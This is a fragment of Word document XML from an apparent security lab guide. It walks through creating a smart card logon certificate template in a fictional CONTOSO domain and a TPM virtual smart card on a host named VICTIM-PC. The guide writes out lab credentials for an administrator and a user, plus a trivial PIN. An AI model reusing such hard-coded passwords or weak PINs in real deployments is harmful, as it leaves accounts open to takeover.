        <w:t xml:space="preserve">Administrative Tools, select Certification Authority and while pressing CTRL+SHIFT, do a right click to display contextual menu “run as different user” and specify </w:t>
      </w:r>
      <w:r w:rsidR="00E257C0" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO\administrator</w:t>
      </w:r>
      <w:r w:rsidR="00E257C0">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> account and </w:t>
      </w:r>
      <w:r w:rsidR="00E257C0" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>FY19-ECE#Pwd!</w:t>
      </w:r>
      <w:r w:rsidR="00E257C0" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E257C0" w:rsidRPr="00E257C0">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00E257C0" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>assword</w:t>
      </w:r>
      <w:r w:rsidR="00E257C0">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Note: you may prompt to change the Administrator password. If it is the case, change the password and use the password you just change instead of the default one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96AA98" w14:textId="1A9295AB" w:rsidR="005937BF" w:rsidRDefault="005937BF" w:rsidP="005937BF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Certification Authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>certsrv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>) console</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, select </w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Certificate Templates</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> container and </w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Manage</w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F845A66" w14:textId="1D607D1D" w:rsidR="00DE5D82" w:rsidRDefault="00DE5D82" w:rsidP="005937BF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In the list select “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Smartcard Logon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">” and </w:t>
      </w:r>
      <w:r w:rsidR="00AF24CC" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>duplicate this template</w:t>
      </w:r>
      <w:r w:rsidR="00AF24CC">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D429B" w14:textId="1C9A848B" w:rsidR="002930B6" w:rsidRDefault="00406CD5" w:rsidP="002930B6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">In Compatibility tab, </w:t>
      </w:r>
      <w:r w:rsidR="002930B6">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compatibility settings for CA “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Windows Server 2012 R2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">” and </w:t>
      </w:r>
      <w:r w:rsidR="002930B6">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>for Certificate recipient “</w:t>
      </w:r>
      <w:r w:rsidR="002930B6" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Windows 8.1 / Windows Server 2012 R2</w:t>
      </w:r>
      <w:r w:rsidR="002930B6">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB94EC" w14:textId="625C3CC4" w:rsidR="002930B6" w:rsidRPr="00C6425D" w:rsidRDefault="002930B6" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002930B6">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="079404AC" wp14:editId="4713A69D">
            <wp:extent cx="2779493" cy="3809185"/>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4443" cy="3843378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC783C" w14:textId="14836237" w:rsidR="00AF24CC" w:rsidRDefault="00AF24CC" w:rsidP="002930B6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">In general tab enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ContosoSmartcardLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> as name and select </w:t>
      </w:r>
      <w:r w:rsidR="00F87236">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>publish in Active Directory</w:t>
      </w:r>
      <w:r w:rsidR="00F87236">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B955BCD" w14:textId="252CFAD5" w:rsidR="002930B6" w:rsidRPr="00C6425D" w:rsidRDefault="00A8347C" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8347C">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="499F78A6" wp14:editId="40EEF039">
            <wp:extent cx="2758389" cy="37553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7057" cy="3780812"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5F528" w14:textId="5FD409AB" w:rsidR="00A8347C" w:rsidRDefault="00A8347C" w:rsidP="002930B6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In Cryptography tab, select “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Key Storage Provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”, then “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Requests must use one of the following providers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>” and select in list “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="000A1126" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Smart Card Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Storage Provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">”. Finally select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>SHA256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> as request hash algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D19A8BE" w14:textId="6483CE8B" w:rsidR="00A8347C" w:rsidRDefault="000A1126" w:rsidP="00A8347C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1126">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000A1126">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14FB29C2" wp14:editId="7AF8800C">
            <wp:extent cx="2678224" cy="365271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3691" cy="3660166"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="603374BC" w14:textId="47FA1FC0" w:rsidR="00A8347C" w:rsidRPr="00C6425D" w:rsidRDefault="00AE171A" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE171A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Note: This setting will ensure that the key pair will be created by the virtual TPM chip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE72AEC" w14:textId="6EC94D43" w:rsidR="0032791A" w:rsidRDefault="0032791A" w:rsidP="002930B6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>In security tab add group GG-LOCADM and ensure you have both Read and Enroll allow permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F71CF6" w14:textId="548C3F48" w:rsidR="00A8347C" w:rsidRPr="00C6425D" w:rsidRDefault="00AE171A" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE171A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23649E73" wp14:editId="69800D8E">
            <wp:extent cx="2752980" cy="3763736"/>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6682" cy="3768798"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="086CDC49" w14:textId="0D60F9AB" w:rsidR="00FF713D" w:rsidRDefault="00FF713D" w:rsidP="00FF713D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Click Apply and close template properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56BC75" w14:textId="54DEEB4D" w:rsidR="00FF713D" w:rsidRDefault="00FF713D" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> run command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -pulse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A618C1F" w14:textId="4D51DE99" w:rsidR="003F3BF4" w:rsidRDefault="00406CD5" w:rsidP="002930B6">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Back in </w:t>
      </w:r>
      <w:r w:rsidR="00AE171A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Certificate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> template container of Certificate Authority console, do a right click and select “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”/”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Certificate Template to Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">” and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ContosoSmartcardLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6400DE" w14:textId="44CBD9B7" w:rsidR="00AE171A" w:rsidRDefault="00AE171A" w:rsidP="00AE171A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE171A">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7275B0" wp14:editId="557117A0">
            <wp:extent cx="3212625" cy="238633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816" cy="2391675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6C1F4A" w14:textId="24EF9D1F" w:rsidR="00AE171A" w:rsidRPr="00C6425D" w:rsidRDefault="00943360" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Run command from elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>: “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -pulse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456951F6" w14:textId="747A1B70" w:rsidR="00AE171A" w:rsidRDefault="00AE171A" w:rsidP="00AE171A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7B860F" w14:textId="6E8E1798" w:rsidR="00AE171A" w:rsidRDefault="00EC7A54" w:rsidP="00EC7A54">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Virtual Smart Card creation on VICTIM-PC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4955759E" w14:textId="3A06A9A9" w:rsidR="00EC7A54" w:rsidRDefault="00EC7A54" w:rsidP="00EC7A54">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Log on VICTIM-PC with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>jdoe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> account and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Rand-2018!Pwd#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA79A41" w14:textId="71B2B34C" w:rsidR="00EC7A54" w:rsidRDefault="009F1860" w:rsidP="00EC7A54">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> as administrator, then enter this command: “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tpmvscmgr.exe create /name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ContosoVSC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /pin prompt /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>adminkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> random /generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F956D5B" w14:textId="1ABE811B" w:rsidR="009F1860" w:rsidRDefault="009F1860" w:rsidP="00EC7A54">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">For PIN try to configure using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>0123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, and confirm </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>0123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>, then enter</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9F1860" w14:paraId="6859B590"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5B79BD22" w14:textId="77777777" w:rsidR="009F1860" w:rsidRDefault="009F1860" w:rsidP="00554E9A">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F1860" w14:paraId="4B232CDC"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4974AF3" w14:textId="31FDCD3A" w:rsidR="009F1860" w:rsidRDefault="009F1860" w:rsidP="00554E9A">
            <w:bookmarkStart w:id="53" w:name="_Hlk528163782"/>
            <w:r>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidR="00B90EA8">
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> the Virtual Smartcard </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>installed</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>? If</w:t>
            </w:r>
            <w:r w:rsidR="00AA2ACB">
              <w:t xml:space="preserve"> it is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> not</w:t>
            </w:r>
            <w:r w:rsidR="00AA2ACB">
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> why?</w:t>
            </w:r>
